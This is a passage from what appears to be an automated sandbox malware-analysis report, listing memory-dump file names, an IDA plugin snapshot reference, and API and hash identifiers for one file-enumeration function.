                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 75b8da1ae65d82ec9e96f22a7b6a895211a83e8bff0bb1262e336795e63949a7
                              • Instruction ID: f9e2816090fd37084ec185b3f7ae2b72ad4b3adb11a8de9495d3a847cb1ecf65
                              • Opcode Fuzzy Hash: 75b8da1ae65d82ec9e96f22a7b6a895211a83e8bff0bb1262e336795e63949a7
                              • Instruction Fuzzy Hash: 0A219B76900204ABCB64FBB0DC86FED337CAB54700F444566B65963181EE7496CDDBE2